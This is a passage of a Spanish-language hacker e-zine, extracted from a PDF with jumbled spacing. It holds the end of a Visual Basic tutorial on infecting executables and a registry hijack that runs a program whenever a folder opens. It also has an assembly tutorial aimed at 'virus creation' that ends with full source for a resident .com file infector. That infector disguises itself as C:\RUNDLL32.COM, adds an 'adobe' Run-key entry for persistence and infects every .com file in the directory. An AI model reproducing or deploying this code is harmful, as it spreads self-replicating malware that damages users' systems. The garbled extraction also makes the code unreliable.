'Eliminamos los archivos temporales:Kill "C:\Temporal.exe"Kill "C:\HostTemporal.exe"
-
8/14/2019 CUH E-zine 3 Edicion
24/69
Programacion VB
Infectar Ficheros Ejecutables CUH e-zine 3 EdicionEnd Function
con esto ya habremos terminado, espero les halla
OTAS:
Yservido.
NPero a pesar de que tengamos ahora esta valiosafuncin, nos hace falta modificar un poco elForm_Load, para saber ni bien se ejecute el virus sise encuentra alojado en un fichero infectado o si esejecutado desde su propio ser =P.
tener el tamao en bytes del virus, una vez
a infeccin de ejecutables en un virus supone un
-Para obque lo hallan compilado se dirigen a l y le hacenclic derecho, van a propiedades y ah les dir eltamao.
As que, vamos a agregar unas lneas al Form_Load:-Lmotor de bsqueda de archivos que realice estaaccin por todo el disco, esto lo podrn encontrarfcilmente en Internet pero yo no lo eh puesto ya quees muy largo.
Private Sub Form_Load()'Declaramos las variables que usaremos.Dim Vx As String, Pe As String
'Si nos estbamos ejecutando _terminamos la aplicacinIf App.PrevInstance Then End
'Establecemos a Vx como la ruta completa _del virus.Vx = App.Path & "\" & App.EXEName & ".exe"
'*Lneas agregadas*'Verificamos si el tamao del virus es _el correcto o pesa mas. De pesar mas _suponemos que se encuentra en un fichero _
infectado, as que llamamos a la funcin _que "desinfecta"If Len(Vx) > 20382 Then
Call DesinfectarFichero(Vx)
Les envo un cordial saludo a todos los lectores de la
Atte. ANYD00M
rticulo escrito formalmente para la CUH E-Zine #3
End If
'Establecemos a Pe como la ruta completa _CUH e-zine y espero nos sigan apoyando como lohan hecho.
del ejecutable a infectar.Pe = "C:\HOST.exe"
'Ya tenemos lo que necesitamos, ahora _[Asolo debemos llamar a la funcin que _
de la comunidad El-Hacker.com]infectara el archivo, pasndole como _parmetros la ruta del virus y la del _archivo a infectar (Pe o "C:\HOST.exe"Call InfectarFichero(Vx, Pe)End Sub
-
8/14/2019 CUH E-zine 3 Edicion
25/69
Programacin
Interceptar apertura carpetas CUH e-zine 3 Edicion
INTERCEPTAR LA APERTURA DE CARPETAS By ANYD00M
INTERCEPTAR LA APERTURA DE CARPETASLo que veremos a continuacin es unamanera de interceptar la apertura deuna carpeta (cualquier carpeta). Elarticulo que sigue se aplicara al
lenguaje Visual Basic 5.0 o 6.0 y tratasobre como modificar el registro..
Esta tcnica es muy simple y no tiene mucho queexplicar, as que vemoslo:
Cuando se abre una carpeta, al igual que al intentarabrir un fichero, se producen una serie deoperaciones que lleva a cabo Windows sobre el
registro para saber con que debe mostrar elcontenido de dicha carpeta.
Esta tcnica se ah visto aplicada a virus, que, comoya saben, las carpetas no se pueden infectar en si,sino su contenido, y esto es lo mas cercano a infectaruna carpeta (abrir la misma y que se abra el virustambin). Lo que veremos nosotros no ser comoaplicarla a un virus, ya que no me interesaraensearles eso, sino aplicrselo a una simpleaplicacin que nos puede servir como seguridadpara nuestras carpetas.
Como lo haremos? Pues no creare una aplicacinde seguridad para carpetas, pero seguramenteentenders como se puede hacer despus de leeresto.
Cuando hacemos doble clic sobre un icono decarpeta, estamos enviando un comando a Windows yeste comenzara a analizarlo. Pues bien, Windowsreconoce que a lo que se le hizo doble clic era a unacarpeta, as que Qu clave de registro tiene queleer para saber como y con que abrirlo? Dicha clave
como ya se deben haber imaginado esta enHKEY_CLASSES_ROOT y es Directory (Completa:HKEY_CLASSES_ROOT\Directory). Esta clavecontiene otra clave llamada Shell y esta clave tiene
un valor, que por defecto ser none (o estar vaci
en algunos casos, creo..). Dicho valor (none) es laaccin que va a cumplir Windows, y la buscara enlas claves que se encuentren dentro de Directory. Sino encuentra dicha accin (none no la va aencontrar por defecto) abrir la carpeta con el
archivo Explorer.exe ubicado en el directorio deWindows (%SystemRoot%).
Lo que haremos nosotros ser cambiar esa accin,none, por una nuestra. Luego agregar esa accin ala clave Directory y cuando Windows encuentre la
clave de la accin lo que pedir ser la aplicacincon que hay que abrir la carpeta, y pues esta sernuestra aplicacin.
Veamos esta pequea imagen hecharudimentalmente en el Paint xD
Como vern, la clave final que debemos modificares: HKEY_CLASSES_ROOT\Directory\Shell ydebemos cambiar su valor por defecto por unaaccin inventada por nosotros, por ej. PROTECTO
Luego debemos aadir esa accin, para ellodebemos crear una clave dentro de Shell con elnombre PROTECTO y en su valor por defectoponer nuestra aplicacin..
-
8/14/2019 CUH E-zine 3 Edicion
26/69
Programacin
Interceptar apertura carpetas CUH e-zine 3 Edicion
Esto seria as:
Private Sub CrearAccion()Dim Wss as object, Yo as stringYo = App.Path & \ & App.EXEName & .exeSet Wss = CreateObject(Scripting.FileSystemObject)Aplicamos la accin:Wss.RegWriteHKEY_CLASSES_ROOT\Directory\Shell\,PROTECTOCreamos la accion:Wss.RegWriteHKEY_CLASSES_ROOT\Directory\Shell\PROTECTO\, Yo & %1End Sub
Con esto ya correramos nuestra aplicacion cada vezque se intente abrir una carpeta. Pero no se estaraabriendo la carpeta, as que la idea seria que en elForm_Load agreguen unas lneas, que verifiquen sinuestra aplicacin esta recibiendo comandos (sehace con el objeto Command$) y si esos comandoscorresponden a una carpeta (lo hacemos conGetAttr). Pero antes debemos arreglar una cosita delcdigo anterior, lo que debemos hacer es agregardespus de nuestra aplicacin en la clavePROTECTO esto: %1 (sin Comillas) esocorresponde a la carpeta que se quiere abrir, paraWindows %1 es una variable ;-)
As que antes de empezar con el Form_Load,arreglemos esa lnea, que nos queda as:
Wss.RegWriteHKEY_CLASSES_ROOT\Directory\Shell\PROTECTO\, Yo & %1
Y no olviden poner el espacio antes del %1 ya quesino lo hacemos, no lo enva como comando...Ahora si, pasemos al Form_Load:
Private Sub Form_Load()Verificamos si recibimos comandosIf Command$ then
Si es as, miramos si es una carpetaIf GetAttr Command$ = VbDirectory Then
Si es una carpeta, la abrimos con elExplorer.exe
Shell %SystemRoot% & \Explorer.exe & Command$
End ifEnd ifEnd Sub
Y listo! Ahora si, con eso nos ejecutamos cuando seabre una carpeta y abrimos dicha carpeta.Si quieres hacer una especie de aplicacin paraproteger carpetas y todava no se te prendi lalamparita, te dar una idea (pero no har cdigo ;-))Con el objeto Command$ recibimos la ruta de lacarpeta que se esta queriendo abrir, as que,previamente tendremos supnganse un archivo, quecontendr todas las carpetas que se desea proteger.As que al recibir los comandos, los comparamos, sies igual a alguno de los que esta en el archivo,pedimos contrasea para abrirlo, si la contrasea esvalida la abrimos, sino no la abrimos. Eso es unapequea idea que les podr ayudar.
Me despido, les envo un cordial saludo.
ANYD00M
-
8/14/2019 CUH E-zine 3 Edicion
27/69
Hacking Newbie
Introduccion Al ASM II CUH e-zine 3 Edicion
INTRODUCCION AL ASM II By The Shadow
INTRODUCCION AL ASM IIORIENTANDONOS AL CRACKING y VirII
CoDiNgUno de los principales usos que
se le puede dar a tener un poco de conocimiento delensamblador, es no estar perdido en tus primerasaproximaciones en el cracking.
En este segundo tuto intentare darles unaorientacin bsica a lo que es el assembler que usanlos crackers para crackear (XD), sin alejarnos delobjetivo artstico de aprender a programar enassembler con aplicacin a la creacin de virus.
PD: Algunos puntos de inters para el cracking,como lo son los registros, los obviar en este tutoya que en la primera parte los expuse.
Algo que tenemos q recordar es el registro IP.
Cuando me refiera a IP, quiero decir Puntero deInstruccin, el cual recordaremos que es donde seubica la instruccin que se esta ejecutando en unprograma.
0- Instruccin LEALEA ~ Load Effective Adress ~ Cargar
direccin efectivaBsicamente realiza la funcion de mov, calcula eloffset del operando origen, y lo almacena en eldestino
Sintaxis: lea (reg/pos),(reg/pos)
Ejemplo: lea ax,dx
1- Instrucciones INC y DEC:
Estas instrucciones son sumamente simples,pero tengo q explikrlas ya q las usaremos despus.Weno imagnense que es como set a=%a%+1 enbatch o a++ en C.
INC ~ Increment ~ Incrementa: como su nombre lodice, aumenta en uno el valor de un registro o deuna posicin de memoria.DEC ~ Decrement ~ Decrementa: como su nombre lo
dice, disminuye en uno el valor de un registro o deuna posicin de memoria.
Ejemplos:INC DX ;Incrementa DX en unoDEC DWORD PTR [DI+102] ;Decrementa en uno elvalor del DWORD ubikdo en [DI+102] del segmentoactual
2- Instrucciones de comparacin CMP y TEST:Los valores que contienen las flags que utilizan lossaltos, los determinan otros comandos, estos son los"comparadores", de estos podemos mencionar losmnemonicos "cmp" y "test", de los cualesestudiaremos el "cmp".
-Sintaxis del "cmp":cmp v1,v2
--donde "v1" corresponde a: un valor hex, unregistro o una posicin de memoria. Al igual que"v1", "v2" tambin representa un valor. As, "cmp
v1,v2", tomara "v1" como valor de destino y "v2"como valor fuente, luego resta el valor fuente menosel valor de destino y actualiza las flags con elresultado. CMP equivale a un SUB lgico, solo q noguarda sus resultados en los registros, pero siactualiza las flags
TEST ~ Comprobar: Equivale a hacer un ANDlgico, solo q no modifica registros, solo actualizalas flags.
3- Manejando saltos condicionales:
En lenguajes de alto nivel, como el basic, se tienencomandos o sentencias que permiten tener un controlsobre las sentencias que se ejecutan en un
-
8/14/2019 CUH E-zine 3 Edicion
28/69
Hacking Newbie
Introduccion Al ASM II CUH e-zine 3 Edicionprograma, a estas les llamaremos "sentenciascondicionales", ya que toman en cuenta elcumplimiento de una condicin para seguir con lasiguiente; entre estos comandos podemos ver: el"if"(como principal); while; until; etc.
En asm tambin tenemos mnemonicoscondicionales, los cuales cada uno de ellosrepresenta una condicin especifica. Como principal
ejemplo tenemos a los saltos. Estos saltos estancondicionados por los valores que poseen las "flags"(registros especiales que vimos en el 1er tuto). Comoya hemos vistos, el mnemonico "jmp" ~ jump ~saltar.. se utiliza para saltar a una posicinespecifica de memoria determinada ya sea por unaetiqueta(en leguajes de macro como en el "TASM") opor una direccin de offset. Tcnicamente esto lohace incrementando el valor de IP (Puntero deInstruccin). Equivale a un GOTO.
Ejemplos:
JMP 0046D24C ;salta a CS:0046D24C.JMP etq1 ;salta a la etiqueta "etq1" dentro delmacro..
Hay varias derivaciones segn la activacin dediferentes flags. As las derivaciones son:
Hexadecimal Assembler Significa75 o 0F85 Jne Salta si no es equivalente
74 o 0F84 Je Salta si es equivalenteEB Jmp Salta directamente a . . .
90 Nop( No OPeration ) Sinoperacin
77 o 0F87 Ja Salta si esta sobre
OF86 Jna Salta si no esta sobre
0F83 Jae Salta si esta sobre o igual
0F82 JnaeSalta si no esta sobre oigual
0F82 Jb Salta si es inferior
0F83 Jnb Salta si no es inferior
0F86 JbeSalta si esta debajo oigual
0F87 JnbeSalta si no esta debajo oigual
0F8F Jg Salta si es mayor
0F8E Jng Salta si no es mayor
0F8D Jge Salta si es mayor o igual
0F8C JngeSalta si no es mayor oigual
0F8C Jl Salta si es menor0F8D Jnl Salta si no es menor
0F8E Jle Salta si es menor o igual
0F8F JnleSalta si no es menor oigual
tabla sacada de la red
En la tabla podemos ver el cdigo en hexadecimal,el mnemnico y su significado.
Weno, para tenerlo mas claro veremos un ejemplo:
MOV DX,00 ;dx==00INI:INC DX ;incrementa el valor dx en 1 dx+1CMP DX,05 ;compara dx con 05JE FOK ;si dx=05 salta a la etiqueta FOKJMP INI ;sino salta a la etiqueta INI
FOK:MOV AH,4C ;ah==4C
Lo que akabamos de ver es un simple bucle queestablece el valor de dx en 00 luego cuando entra enla etiqueta ini, se incrementa el valor de dx, o sea
que, si antes de entrar en la etiqueta dx era 00despus del INC DX, dx tomaba el valor de 01 y assucesivamente mientras se mantuviera en el bucle,luego de que el valor de dx se incrementa, este secompara con el valor 05, si la flan equal seactiva, entonces salta a la etiqueta FOK, sinovuelva a INI.
Esto es algo que veremos muy frecuente eningeniera inversa.
3.1-Saltos cortos, cercanos y largos.
Hay veces que necesitamos indicar que tipode salto realizaremos dependiendo de tan lejossaltaremos.
JMP SHORT ~ Salto corto: Se realiza si vamos asaltar a una direccin comprendida entre lo q puededos bytes (-128 a +127 antes o despus de IP actual).00402207 JMP SHORT 402100
JMP NEAR ~ Salto cercano: Se realiza si vamos asaltar a una direccin comprendida entre lo q puedeun byte (-32768 a +32767 antes o despus de IPactual).00402207 JMP NEAR 404010
Un salto largo es ya cuando se tiene comodistancia el contenido de 4 bytes. Este tipo de saltosse ven cuando un programa llama a una funcin deun modulo.Por ejemplo para saltar a USER32.GetDlgItemTextAdesde el app.00401171:
------------------------------------------app.exe----------
-
8/14/2019 CUH E-zine 3 Edicion
29/69
Hacking Newbie
Introduccion Al ASM II CUH e-zine 3 Edicion00401171 JMP DWORD PTRDS:[]---------------------------------------------------------------
Algo que tenemos que tomar en cuenta esque las especificaciones de corto, cercano y lejano,tambin debemos especificarlas en las dems
derivaciones de saltos (los condicionales), claro,cuando sea necesario.
4- Instrucciones PUSH y POP. La PILA o STACK
Para empezar con esto, tengamos estediagrama en mente:
PUSH Y = mete el valor de Y en el almacnPOP X = saca y guarda, el ultimo valor metido en elalmacn, en X
Almacn =| || || |
| _ _ |
A = 1B = 2C = 3D = 0
PUSH A| || || |
| _1_ | PUSH C
| || || 3 |
| _1_ | PUSH B
| || 2 || 3 |
| _1_ | POP D
. . . . . . . .D = 2 . : | : | | |
| 2 | | || 3 | | 3 || _1_ | | _1_ |
Ahora veamos como se vera este diagrama en asm:MOV AH,01 ;AH=01MOV AL,02 ;Al=02MOV DH,03 ;DH=03MOV DL,00 ;DL=0
PUSH AH ;AH a stackPUSH DH ;DH a stackPUSH AL ;AL a stackPOP DL ;recordemos q el ultimo valor en entrar a lapila fue el de AL, y AL vale 02 asiq DL=02
Por si acaso:
PUSH X ~ Meter: Mete el valor de el registro X en lapilaPOP Y ~ Sacar: Saca y guarda en el registro Y elultimo valor introducido en la pila.
La pila es como un almacn donde seguardan valores de los registros. Recordemos que ladireccin de la pila esta especificada por losregistros:SS:SP (Stack Segment:Stack Pointer ~ Segmento de lapila:Puntero actual de la pila).
5- Instruccin LOOPWeno esencialmente, esta instruccin la usaremos ala hora de crear bucles y no qeremos meternos conmov-inc-cmp-jne. Bsicamente lo que hace LOOP escomparar CX con 0 si CX=0 entoncs continua con lasiguiente instruccin si no vuelve a su parmetro.LOOP decrementa el valor de CX cada ves que IP seubica en el.
-Su sintaxis es:
LOOP PARAM
-- donde PARAM es la instruccin a la cual volvera IPsi CX no es igual a 0
Ejemplo:
MOV CX,05hINI:
LOOP INIFOK:
6- Instrucciones CALL Y RET:
La orden CALL equivale a un CALL en batch.Y RET equivale a GOTO :EOF en batch. Su sintaxises como la del JMP, se permiten etiquetas, registros,direcciones de memoria. CALL lo que hace esintroducir IP+1 en la pila, o sea la instruccin quesigue al CALL, y salta a la direccin que se le indica,RET toma el valor que introduce el CALL en la pila, ysalta a el.
Ejemplo en Batch:SET NOMBRE=JORGECALL :EC %NOMBRE%EXIT:EC
-
8/14/2019 CUH E-zine 3 Edicion
30/69
Hacking Newbie
Introduccion Al ASM II CUH e-zine 3 EdicionECHO %1GOTO :EOFEjemplo en ASM:NOM DB "JORGE$".CODEINI:
MOV AX,@DATAMOV DS,AXMOV DX,OFFSET NOMMOV AH,9CALL XXIJMP OTERXXI:INT 21HRET
6- Funciones dentro de un programa escrito enTASM.
En lenguajes como el BASIC, tenemos laopcin de tener subrutinas las cuales podemosllamar en cualquier momento asi podemos ver enBASIC:Sub sumd(Dim var as Integer)var = var + 1End Sub
En TASM tambin podemos tener funciones.As podemos ver el ejemplo en BASIC en TASM:sumd macro var
mov dx, varinc dxENDM
Donde sumd es el nombre del macro,
macro especifica que una funcin y var se refiere ael argumento de la llamada.
Las funciones se deben especificar antes deel cdigo (segmento .code o .text).
7- Estructura de un ejecutable escrito en TASM (2daforma)
En el tuto anterior aprendimos una forma deestructura para crear un programa con TASMmediante la definicin concreta de los segmentos decdigo, esta vez aprenderemos otra forma en la cualasumiremos los segmentos en el proceso principal.
Sintaxis A (Estableciendo todos los segmentos):---------------------------------------------------------------
;definicin de constantes y modelo;macros
------------------------------------stack---------------------stac SEGMENT PARA STACK 'stack'
;definicin de bufferstac ENDS------------------------------------segmento .data---------data SEGMENT PARA PUBLIC
;definicin de valoresdata ENDS------------------------------------segmento .code---------codi SEGMENT PARA PUBLIC 'code'
prin PROC FARASSUME CS:codi, DS:data, SS:stac, ES:eseg
;codigo del programaprin ENDPcodi ENDSprin END------------------------------------segmento extra---------eseg SEGMENT PARA PUBLIC
;cdigoEseg ENDS--------------------------------------FIN---------------------
Sintaxis B (Asumiendo segmentos sin definirlostodos):
---------------------------------------------------------------;definicin de constantes y modelo;macros
------------------------------------segmento .code---------codi SEGMENT PARA PUBLIC 'code'prin PROC FAR
ASSUME CS:codi, DS:codi, ES:codi;codigo del programa
prin ENDPcodi ENDSprin END-------------------------------------FIN----------------------
Nota: Si no necesitamos establecer la pila, bienpodemos omitir su inclusin en el programa.
8- Programa de practica:Weno como programa de practica haremos un codealgo rebuskdo pero q en fin nos ayudara a veralgunas estructuras que vimos en este tuto, ademsde algunos servicios de la int 21h y una inclusinpara los q somos batch coderz, como podemosfusionar un archivo .bat y uno .com! .. xD
.286;especificamos el modelo
prog segment byte public 'CODE'assume cs:prog, es:prog, ds:prog
;definimos segmentosorg 100h
ini:;escribimos el codigo batch q se ejecutara en .bat
db '@ECHO OFF',0dh,0ahdb ':'jmp hma
-
8/14/2019 CUH E-zine 3 Edicion
31/69
Hacking Newbie
Introduccion Al ASM II CUH e-zine 3 Edicion;cuando se ejecuta el .com aki saltamos al areavirica
db 0dh,0ahdb 'COPY %0.BAT '
virr_com: db 'C:\RUNDLL32.COM'db '>NUL',0dh,0ah
db'reg addHKLM\software\microsoft\windows\currentversion\
run /v adobe /d "C:\RUNDLL32.COM" /f',0dh,0ahdb 'C:\RUNDLL32.COM',0dh,0ahdb 1ah
copi label byte;aki especificamos donde comienza el fragmento acopiararch: db "*.com",0;especificamos el tipo de archivos a infectarhma proc near
mov di,0ffffhmov bx,copif-a_hma+05hmov ax,4a02h ;ya
estamos residentes?int 2fhinc dijz salr ;si ya
estamos residentes, nos vamospush dicld ;flag de
acarreo a 0mov si,offset a_hma ;comienza
desde el offset de a_hmamov cx, copif-a_hma ;cantidad a
pasarrep movsb ;pedimos
residencia en hmahma endpa_hma label bytecodi proc near
mov ah,04eh ; servicio 4eh(buscar primer archivo del directorio actual)
lea dx,arch ; CX =atributosint 21h ; DS:DX ->
filespec ;(en nuestro caso: archive ~ *.com)
enc_arch:mov ax,3d02h ; servicio 3dh
(Abrir archivo)mov dx,9eh ; DS:DX ->
nombre del archivo (en nuestro caso usamos el9eh~dta del 4eh)
int 21h ; AL =modo de apertura .. 2 leer y escribircopir_arch:
mov cx,copif-copi ; servicio 40h(escribir en archivo)
lea dx,copi ; CX =numero de bytes a escribir
mov ah,40h ; DS:DX ->buffer
int 21hmov ah,3eh ;servicio 3eh
(cerrar archivo)int 21h
cont:mov ah,4fh ;servicio 4fh
(buscar siguiente archivo)int 21hjnb enc_arch ;si existen
mas archivos, los infectamos, sino terminamos
salr:int 20h
;devolvemos controlcopif label byte ; lo usamospara cuestiones del cantidad de bytes a copiarcodi endpprog ends
end ini
El programa es un infectador de archivos.com residente, el programa es bastante sencillopero nos ayudara a tener algunos conceptos enorden, adems que vemos la tcnica de residenciapor hma (high memory acess) y algunos servicios demanejo de archivos, si bien no se pudo explikr bienel programa a sido por cuestiones de espacio eintentando que el lector desarrolle la habilidad deinvestigar, corregir errores y analizar.
Me conformo con q un 70% haya podido sercomprendido =D .. Saludos y hasta la prxima!
The Shadow
-
8/14/2019 CUH E-zine 3 Edicion
32/69
Programacion
Manual Batch CUH e-zine 3 Edicion
Manual de Batch By Espectro Infernal
MANUAL UTILIDAD FOR + CALL + ETIQUETABueno, en este manual voy aexplicar uno de los usos msfrecuentes y habituales en el
comando FOR. Es una utilidad fcilde aprender (si ya se sabe manejar con
las funcionalidades bsicas del FOR) y a la vez, muytil. Saber utilizar correctamente y con ingenio estautilidad